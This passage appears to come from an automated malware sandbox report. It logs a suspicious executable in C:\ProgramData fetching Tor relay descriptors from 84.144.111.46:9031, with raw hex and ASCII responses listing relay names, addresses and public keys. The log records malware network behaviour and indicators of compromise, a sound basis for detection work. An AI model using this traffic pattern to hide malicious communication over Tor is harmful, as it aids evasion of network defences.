6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 31 3a 31 34 3a 34 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 34 35 42 43 20 39 39 31 37 20 46 37 45 31 20 33 37 37 30 20 37 33 36 42 20 42 46 46 43 20 32 32 45 36 20 46 31 37 30 20 45 31 34 45 20 31 36 45 43 0a 75 70 74 69 6d 65 20 31 32 39 37 39 34 0a 62 61 6e 64 77 69 64 74 68 20 32 30 34 38 30 30 30 20 34 30 39 36 30 30 30 20 32 33 35 34 36 36 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 44 35 35 35 45 35 42 33 38 32 30 38 46 33 42 35 34 43 39 34 36 36 33 42 44 41 34 42 42 41 39 45 41 34 36 38 38 39 35 33 20 46 6b 7a 77 47 61 56 66 32 64 33 57 75 4a 35 31 35 38 67 47 47 5a 38 49 46 6e 37 38 30 6c 70 48 34 55 42 48 47 51 52 6c 79 4b 6f 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 59 39 51 49 68 2f 79 69 58 64 4a 51 31 79 51 58 64 6a 53 6f 6e 68 54 6b 6a 41 67 58 4d 34 58 7a 6e 38 75 78 77 79 44 73 4e 7a 65 57 6a 31 54 5a 45 54 36 5a 57 5a 0a 6c 32 47 52 4b 41 4e 46 77 46 53 56 52 49 63 6d 69 34 33 75 75 63 54 69 43 7a 48 31 65 72 53 72 57 30 6b 52 4a 62 65 62 4a 65 4a 68 43 35 77 69 74 51 52 76 4a 49 63 6b 75 79 49 4f 74 37 30 64 0a 43 68 76 31 36 6b 77 55 4a 4d 69 63 7a 79 44 70 59 2f 77 37 5a 6c 32 76 43 6c 6a 59 69 6e 79 33 73 4b 57 42 70 58 41 35 5a 41 61 2b 79 4e 75 70 67 42 6e 35 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 42 46 39 45 44 68 4c 53
                          Data Ascii: router GalaxyNewsRadio 84.62.245.6 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxUxAVbs1PI0VDEFUz55fRfxh+7MGNrA5t5aN3IesGfsUqxQAQAgBABBQHKwM8IGgQ9dK2R4NMgzsLz/onx3FQItuxRviMt6HWhSKcoj6ewElNnaP4YoESMzdmvsKUrrzYeLejw33pUH8qKCproA73Xm+dRyD8S2r6+FSrkvCwUuxtAkPA51bQU=-----END ED25519 CERT-----master-key-ed25519 QUBysDPCBoEPXStkeDTIM7C8/6J8dxUCLbsUb4jLeh0platform Tor 0.4.7.10 on OpenBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 01:14:47fingerprint 45BC 9917 F7E1 3770 736B BFFC 22E6 F170 E14E 16ECuptime 129794bandwidth 2048000 4096000 2354662extra-info-digest D555E5B38208F3B54C94663BDA4BBA9EA4688953 FkzwGaVf2d3WuJ5158gGGZ8IFn780lpH4UBHGQRlyKoonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALY9QIh/yiXdJQ1yQXdjSonhTkjAgXM4Xzn8uxwyDsNzeWj1TZET6ZWZl2GRKANFwFSVRIcmi43uucTiCzH1erSrW0kRJbebJeJhC5witQRvJIckuyIOt70dChv16kwUJMiczyDpY/w7Zl2vCljYiny3sKWBpXA5ZAa+yNupgBn5AgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALBF9EDhLS


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          36192.168.2.34974184.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:41.668864965 CET7821OUTGET /tor/server/fp/742091486d04734c57d97bcefb53d22ed0b77881 HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:41.714632034 CET7823INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:27 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:27 GMT
                          Data Raw: 72 6f 75 74 65 72 20 65 66 66 69 6f 72 67 6f 75 6c 75 20 31 38 35 2e 36 37 2e 38 32 2e 31 31 34 20 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 62 56 41 5a 64 7a 4a 32 68 6a 4c 57 64 38 35 2f 72 59 2f 49 2f 78 4e 48 33 61 62 46 77 74 2f 72 5a 5a 54 43 38 75 67 6f 66 59 59 44 4c 75 41 51 41 67 42 41 44 70 6f 7a 46 6c 0a 70 52 74 58 35 53 6e 76 46 6f 48 62 35 4f 43 4c 71 4a 54 5a 4b 42 6f 31 4a 64 51 63 42 68 6c 6f 77 4e 61 7a 65 4c 53 66 46 4c 45 35 53 6d 6e 39 67 50 78 41 49 36 59 38 65 75 59 42 44 67 4d 4c 0a 43 44 54 78 6f 5a 5a 73 48 42 52 39 31 36 78 57 78 6b 71 42 59 76 2b 48 56 71 49 53 51 51 44 79 61 4b 6c 4d 47 69 67 38 42 73 45 6a 37 78 6a 7a 35 65 6c 67 30 4a 49 73 53 77 34 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 36 61 4d 78 5a 61 55 62 56 2b 55 70 37 78 61 42 32 2b 54 67 69 36 69 55 32 53 67 61 4e 53 58 55 48 41 59 5a 61 4d 44 57 73 33 67 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 37 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 36 3a 34 30 3a 32 38 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 37 34 32 30 20 39 31 34 38 20 36 44 30 34 20 37 33 34 43 20 35 37 44 39 20 37 42 43 45 20 46 42 35 33 20 44 32 32 45 20 44 30 42 37 20 37 38 38 31 0a 75 70 74 69 6d 65 20 34 38 33 38 34 34 34 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 39 32 30 32 31 35 30 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 42 46 36 42 37 37 42 44 33 34 33 39 36 32 45 42 42 38 30 37 36 44 31 45 42 42 39 38 35 36 45 35 36 38 32 34 33 30 44 35 20 6b 4a 51 74 54 73 74 4e 36 36 72 37 44 6e 66 66 71 68 6a 63 54 47 4c 65 44 4e 37 32 65 6f 45 68 71 61 42 39 55 34 48 57 6b 77 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4f 4f 57 57 34 43 6e 65 6c 77 44 53 49 59 51 36 6b 76 69 39 64 47 70 4c 4c 6f 38 41 62 56 38 66 5a 6a 55 41 42 6f 2f 75 64 6b 55 33 62 58 63 32 68 39 34 4e 4f 33 49 0a 78 57 59 66 54 6a 6d 35 6b 68 79 66 6e 6e 67 36 6a 70 79 54 44 62 46 43 66 4c 59 4c 6f 44 51 6b 61 71 53 75 4d 31 46 37 51 5a 75 48 4a 4b 79 47 42 6c 4c 67 4a 4e 56 2b 61 33 78 4b 6a 74 49 77 0a 34 61 45 7a 6f 31 4f 46 51 42 58 32 49 4e 47 4e 52 32 37 30 6b 2f 6e 62 68 4e 63 4f 31 41 36 4b 66 69 6c 38 57 4a 63 6e 77 41 4e 68 33 51 59 70 4a 56 37 76 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 64 61 4f 2f 50 38 4f
                          Data Ascii: router effiorgoulu 185.67.82.114 443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxbVAZdzJ2hjLWd85/rY/I/xNH3abFwt/rZZTC8ugofYYDLuAQAgBADpozFlpRtX5SnvFoHb5OCLqJTZKBo1JdQcBhlowNazeLSfFLE5Smn9gPxAI6Y8euYBDgMLCDTxoZZsHBR916xWxkqBYv+HVqISQQDyaKlMGig8BsEj7xjz5elg0JIsSw4=-----END ED25519 CERT-----master-key-ed25519 6aMxZaUbV+Up7xaB2+Tgi6iU2SgaNSXUHAYZaMDWs3gplatform Tor 0.4.7.7 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 06:40:28fingerprint 7420 9148 6D04 734C 57D9 7BCE FB53 D22E D0B7 7881uptime 4838444bandwidth 1073741824 1073741824 9202150extra-info-digest BF6B77BD343962EBB8076D1EBB9856E5682430D5 kJQtTstN66r7DnffqhjcTGLeDN72eoEhqaB9U4HWkwMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAOOWW4CnelwDSIYQ6kvi9dGpLLo8AbV8fZjUABo/udkU3bXc2h94NO3IxWYfTjm5khyfnng6jpyTDbFCfLYLoDQkaqSuM1F7QZuHJKyGBlLgJNV+a3xKjtIw4aEzo1OFQBX2INGNR270k/nbhNcO1A6Kfil8WJcnwANh3QYpJV7vAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALdaO/P8O


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          37192.168.2.34974284.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:42.000152111 CET7829OUTGET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:42.045800924 CET7830INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:27 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:27 GMT
                          Data Raw: 72 6f 75 74 65 72 20 47 61 6c 61 78 79 4e 65 77 73 52 61 64 69 6f 20 38 34 2e 36 32 2e 32 34 35 2e 36 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 55 78 41 56 62 73 31 50 49 30 56 44 45 46 55 7a 35 35 66 52 66 78 68 2b 37 4d 47 4e 72 41 35 74 35 61 4e 33 49 65 73 47 66 73 55 71 78 51 41 51 41 67 42 41 42 42 51 48 4b 77 0a 4d 38 49 47 67 51 39 64 4b 32 52 34 4e 4d 67 7a 73 4c 7a 2f 6f 6e 78 33 46 51 49 74 75 78 52 76 69 4d 74 36 48 57 68 53 4b 63 6f 6a 36 65 77 45 6c 4e 6e 61 50 34 59 6f 45 53 4d 7a 64 6d 76 73 0a 4b 55 72 72 7a 59 65 4c 65 6a 77 33 33 70 55 48 38 71 4b 43 70 72 6f 41 37 33 58 6d 2b 64 52 79 44 38 53 32 72 36 2b 46 53 72 6b 76 43 77 55 75 78 74 41 6b 50 41 35 31 62 51 55 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 51 55 42 79 73 44 50 43 42 6f 45 50 58 53 74 6b 65 44 54 49 4d 37 43 38 2f 36 4a 38 64 78 55 43 4c 62 73 55 62 34 6a 4c 65 68 30 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4f 70 65 6e 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 31 3a 31 34 3a 34 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 34 35 42 43 20 39 39 31 37 20 46 37 45 31 20 33 37 37 30 20 37 33 36 42 20 42 46 46 43 20 32 32 45 36 20 46 31 37 30 20 45 31 34 45 20 31 36 45 43 0a 75 70 74 69 6d 65 20 31 32 39 37 39 34 0a 62 61 6e 64 77 69 64 74 68 20 32 30 34 38 30 30 30 20 34 30 39 36 30 30 30 20 32 33 35 34 36 36 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 44 35 35 35 45 35 42 33 38 32 30 38 46 33 42 35 34 43 39 34 36 36 33 42 44 41 34 42 42 41 39 45 41 34 36 38 38 39 35 33 20 46 6b 7a 77 47 61 56 66 32 64 33 57 75 4a 35 31 35 38 67 47 47 5a 38 49 46 6e 37 38 30 6c 70 48 34 55 42 48 47 51 52 6c 79 4b 6f 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 59 39 51 49 68 2f 79 69 58 64 4a 51 31 79 51 58 64 6a 53 6f 6e 68 54 6b 6a 41 67 58 4d 34 58 7a 6e 38 75 78 77 79 44 73 4e 7a 65 57 6a 31 54 5a 45 54 36 5a 57 5a 0a 6c 32 47 52 4b 41 4e 46 77 46 53 56 52 49 63 6d 69 34 33 75 75 63 54 69 43 7a 48 31 65 72 53 72 57 30 6b 52 4a 62 65 62 4a 65 4a 68 43 35 77 69 74 51 52 76 4a 49 63 6b 75 79 49 4f 74 37 30 64 0a 43 68 76 31 36 6b 77 55 4a 4d 69 63 7a 79 44 70 59 2f 77 37 5a 6c 32 76 43 6c 6a 59 69 6e 79 33 73 4b 57 42 70 58 41 35 5a 41 61 2b 79 4e 75 70 67 42 6e 35 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 42 46 39 45 44 68 4c 53
                          Data Ascii: router GalaxyNewsRadio 84.62.245.6 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxUxAVbs1PI0VDEFUz55fRfxh+7MGNrA5t5aN3IesGfsUqxQAQAgBABBQHKwM8IGgQ9dK2R4NMgzsLz/onx3FQItuxRviMt6HWhSKcoj6ewElNnaP4YoESMzdmvsKUrrzYeLejw33pUH8qKCproA73Xm+dRyD8S2r6+FSrkvCwUuxtAkPA51bQU=-----END ED25519 CERT-----master-key-ed25519 QUBysDPCBoEPXStkeDTIM7C8/6J8dxUCLbsUb4jLeh0platform Tor 0.4.7.10 on OpenBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 01:14:47fingerprint 45BC 9917 F7E1 3770 736B BFFC 22E6 F170 E14E 16ECuptime 129794bandwidth 2048000 4096000 2354662extra-info-digest D555E5B38208F3B54C94663BDA4BBA9EA4688953 FkzwGaVf2d3WuJ5158gGGZ8IFn780lpH4UBHGQRlyKoonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALY9QIh/yiXdJQ1yQXdjSonhTkjAgXM4Xzn8uxwyDsNzeWj1TZET6ZWZl2GRKANFwFSVRIcmi43uucTiCzH1erSrW0kRJbebJeJhC5witQRvJIckuyIOt70dChv16kwUJMiczyDpY/w7Zl2vCljYiny3sKWBpXA5ZAa+yNupgBn5AgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALBF9EDhLS


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          38192.168.2.34974384.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:42.181884050 CET7833OUTGET /tor/server/fp/38ca28d8b9980ccd9ab830d3006bb698ce99b20d HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:42.227605104 CET7834INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:27 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:27 GMT
                          Data Raw: 72 6f 75 74 65 72 20 56 54 49 53 75 70 70 6f 72 74 31 20 38 32 2e 32 32 31 2e 31 32 38 2e 32 32 30 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 5a 63 41 65 4b 56 6f 6e 46 6a 46 34 4d 5a 61 78 51 59 7a 41 4b 78 32 61 31 6e 52 72 6c 2f 2f 50 43 62 49 41 45 71 42 63 55 76 52 49 37 31 41 51 41 67 42 41 42 45 6d 62 45 76 0a 68 78 37 44 65 35 4e 47 36 6d 54 4c 69 66 46 57 36 2b 63 53 64 59 48 76 69 51 6b 79 64 2b 56 75 76 65 6f 4e 6d 57 6a 4d 42 34 2b 33 57 34 54 4b 64 38 77 52 6f 37 32 6b 49 34 4c 76 4b 45 73 52 0a 42 6c 35 32 32 2f 66 79 4a 52 42 46 4c 64 36 49 76 79 4e 48 53 7a 38 75 4e 63 79 4b 38 62 6b 37 74 48 39 32 65 52 78 38 78 37 35 67 36 54 70 68 56 41 31 45 45 61 71 6f 51 41 63 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 52 4a 6d 78 4c 34 63 65 77 33 75 54 52 75 70 6b 79 34 6e 78 56 75 76 6e 45 6e 57 42 37 34 6b 4a 4d 6e 66 6c 62 72 33 71 44 5a 6b 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 31 35 3a 33 33 3a 31 32 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 38 43 41 20 32 38 44 38 20 42 39 39 38 20 30 43 43 44 20 39 41 42 38 20 33 30 44 33 20 30 30 36 42 20 42 36 39 38 20 43 45 39 39 20 42 32 30 44 0a 75 70 74 69 6d 65 20 35 31 38 34 35 32 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 34 30 33 30 34 36 37 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 34 33 33 45 43 43 39 42 34 30 37 36 46 36 31 44 45 30 42 43 37 35 37 44 44 31 39 41 44 45 36 31 35 42 30 38 33 38 30 46 20 6d 49 2f 58 7a 37 50 78 4f 37 69 39 6a 67 63 64 74 75 53 6b 67 31 51 66 4b 38 48 47 67 53 6f 43 70 72 36 2b 33 52 37 54 38 64 67 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 64 6d 52 4b 67 59 74 61 4d 46 5a 49 70 6d 44 59 53 49 67 5a 2f 72 63 35 44 62 31 53 55 65 4d 73 47 6a 79 39 63 32 56 35 5a 62 4a 36 4a 64 7a 63 5a 32 36 4f 41 79 0a 58 4f 6a 31 50 52 2b 6b 68 75 54 74 4c 61 38 4a 52 78 30 4f 42 4c 35 74 7a 57 59 42 6f 59 6d 49 38 66 76 47 57 71 6f 46 50 71 67 6b 57 6a 59 48 51 69 7a 44 61 5a 34 79 55 4b 2f 6f 4f 35 37 4a 0a 73 63 62 70 4c 6f 72 36 4f 7a 37 4c 47 6d 63 44 75 33 66 68 33 34 41 54 2f 34 59 5a 68 73 5a 58 72 33 64 4c 6e 4a 62 32 34 72 6b 49 48 31 39 51 4c 67 4f 6c 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 4c 33 2b 74
                          Data Ascii: router VTISupport1 82.221.128.220 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxZcAeKVonFjF4MZaxQYzAKx2a1nRrl//PCbIAEqBcUvRI71AQAgBABEmbEvhx7De5NG6mTLifFW6+cSdYHviQkyd+VuveoNmWjMB4+3W4TKd8wRo72kI4LvKEsRBl522/fyJRBFLd6IvyNHSz8uNcyK8bk7tH92eRx8x75g6TphVA1EEaqoQAc=-----END ED25519 CERT-----master-key-ed25519 RJmxL4cew3uTRupky4nxVuvnEnWB74kJMnflbr3qDZkplatform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 15:33:12fingerprint 38CA 28D8 B998 0CCD 9AB8 30D3 006B B698 CE99 B20Duptime 518452bandwidth 1073741824 1073741824 40304672extra-info-digest 433ECC9B4076F61DE0BC757DD19ADE615B08380F mI/Xz7PxO7i9jgcdtuSkg1QfK8HGgSoCpr6+3R7T8dgonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBANdmRKgYtaMFZIpmDYSIgZ/rc5Db1SUeMsGjy9c2V5ZbJ6JdzcZ26OAyXOj1PR+khuTtLa8JRx0OBL5tzWYBoYmI8fvGWqoFPqgkWjYHQizDaZ4yUK/oO57JscbpLor6Oz7LGmcDu3fh34AT/4YZhsZXr3dLnJb24rkIH19QLgOlAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKL3+t


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          39192.168.2.34974484.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:42.720216036 CET7841OUTGET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:42.765985966 CET7842INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:28 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:28 GMT
                          Data Raw: 72 6f 75 74 65 72 20 47 61 6c 61 78 79 4e 65 77 73 52 61 64 69 6f 20 38 34 2e 36 32 2e 32 34 35 2e 36 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 55 78 41 56 62 73 31 50 49 30 56 44 45 46 55 7a 35 35 66 52 66 78 68 2b 37 4d 47 4e 72 41 35 74 35 61 4e 33 49 65 73 47 66 73 55 71 78 51 41 51 41 67 42 41 42 42 51 48 4b 77 0a 4d 38 49 47 67 51 39 64 4b 32 52 34 4e 4d 67 7a 73 4c 7a 2f 6f 6e 78 33 46 51 49 74 75 78 52 76 69 4d 74 36 48 57 68 53 4b 63 6f 6a 36 65 77 45 6c 4e 6e 61 50 34 59 6f 45 53 4d 7a 64 6d 76 73 0a 4b 55 72 72 7a 59 65 4c 65 6a 77 33 33 70 55 48 38 71 4b 43 70 72 6f 41 37 33 58 6d 2b 64 52 79 44 38 53 32 72 36 2b 46 53 72 6b 76 43 77 55 75 78 74 41 6b 50 41 35 31 62 51 55 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 51 55 42 79 73 44 50 43 42 6f 45 50 58 53 74 6b 65 44 54 49 4d 37 43 38 2f 36 4a 38 64 78 55 43 4c 62 73 55 62 34 6a 4c 65 68 30 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4f 70 65 6e 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 